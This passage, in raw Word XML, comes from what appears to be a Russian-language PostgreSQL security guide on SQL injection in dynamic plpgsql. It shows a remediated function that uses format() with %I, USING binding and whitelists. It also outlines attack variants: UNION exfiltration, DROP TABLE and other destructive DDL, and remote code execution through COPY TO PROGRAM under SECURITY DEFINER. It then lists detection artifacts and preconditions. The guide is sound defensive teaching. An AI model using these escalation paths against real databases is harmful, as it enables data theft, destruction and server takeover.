          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    -- 4. Whitelist для order_dir</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F4B50F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    IF order_dir NOT IN ('ASC', 'DESC') THEN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D2B9EB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        RAISE EXCEPTION 'invalid order direction: %', order_dir;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5333526C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    END IF;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72EDE25B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B11B731" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    -- 5. Построение SQL: identifier через %I, value через USING</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61ADAFA3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    RETURN QUERY EXECUTE format(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F37DC13" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        'SELECT * FROM %I.%I WHERE %I = $1 ORDER BY id %s',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D02B943" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        schema_name, report_table, filter_col, order_dir</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C8A42E9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F35E35A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    USING filter_value;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="215FAD2B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>END;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E830A4F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$$;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="342F61AD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Изменения:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C2EFC2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>tenant_id</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — regex </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>^[0-9]+$</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> гарантирует только digit (никакого </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:t>, identifier-chars).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0974AB04" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>report_table</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>filter_col</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;&gt; ALL(whitelist)</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD15B25" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>order_dir</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>NOT IN ('ASC', 'DESC')</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (whitelist на 2 значения).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A2781B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>filter_value</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>USING</w:t>
      </w:r>
      <w:r>
        <w:t>, value-bind.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E6593C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   Identifier components — через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`%I`</w:t>
      </w:r>
      <w:r>
        <w:t>, identifier-quoting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77FA19D3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>order_dir</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> подставляется через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>%s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (после whitelist!) — это безопасно, потому что после whitelist значение гарантированно </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'ASC'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> или </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'DESC'</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50BDBB59" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Каждый из 5 параметров обработан правильным инструментом</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Это и есть </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>canonical safe pattern</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для dynamic SQL в plpgsql.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C91D60" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Что произойдёт.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Variant A — exfiltration через UNION (3.1 канал). Variant B — destructive DDL или INSERT под caller-privilege; под SECURITY DEFINER — под owner. Variant C — full RCE через COPY TO PROGRAM (3.7.1) если функция SECURITY DEFINER + owner=superuser. Любой из вариантов в production daemon — критический incident.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5378AFC2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Артефакты атаки:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57FB950B"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внутри EXECUTE — multiple statements, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>COPY ... TO PROGRAM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DROP TABLE</w:t>
      </w:r>
      <w:r>
        <w:t>, UNION в простых SELECT.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6991B297" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>log_min_messages = warning</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>RAISE NOTICE 'executing: %'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> сохраняет full constructed SQL в server log → видны все payload-ы целиком.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="157D44C4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>log_statement = mod</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> или </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>= ddl</w:t>
      </w:r>
      <w:r>
        <w:t>: DROP/CREATE/INSERT внутри EXECUTE — критичные сигналы.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C3DAFD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   Application-логи: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>relation "..." does not exist</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> от user-driven endpoint с очень длинным relation_name.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B4CFD6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`pg_proc` audit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: критичный — все функции с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>EXECUTE ... || ...</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> без USING — кандидаты на рефакторинг.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="209619DE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Почему это работает.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>накопленный класс ошибок</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> одной функции:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="396B0AF4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1. Каждый </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>||</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> без </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>quote_ident</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>quote_literal</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> создаёт injection-точку.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A8FFA0C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2. Identifier-positions требуют </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>quote_ident</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>%I</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (3.16.1).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60787C2B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">3. Value-positions требуют </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>quote_literal</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>%L</w:t>
      </w:r>
      <w:r>
        <w:t>/USING (3.16.3).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09406759" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4. Whitelist обязательны для </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>позиций, которые нельзя bind</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (ORDER BY direction, identifier).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06C98020" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>RAISE NOTICE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в production-функции — leak SQL-text в server logs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B450757" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Каждая из этих ошибок by itself — known antipattern. Реальные legacy функции </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>накапливают все пять</w:t>
      </w:r>
      <w:r>
        <w:t>, потому что разработчик «копировал и расширял» под новые tenant/report без рефакторинга.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22378BE5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Корень — отсутствие культуры использования </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>format()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> + USING в plpgsql. В Python/Java standard ORM защищает от value-injection «по умолчанию» — разработчик не думает об этом. В plpgsql </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>каждый dynamic SQL — это manual SQL-builder</w:t>
      </w:r>
      <w:r>
        <w:t>, и каждый разработчик должен явно вызывать защитные функции.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47FE8A43" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Требования к среде.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B0AFD6A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Версия PG:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> все версии. Антипаттерн возможен с самых ранних plpgsql (с 6.x).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA89384" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Привилегия атакующего:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> EXECUTE на уязвимую функцию + (для Variant C RCE) функция должна быть SECURITY DEFINER или caller должен иметь </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_execute_server_program</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="412FF7C9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Pre-condition в коде:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
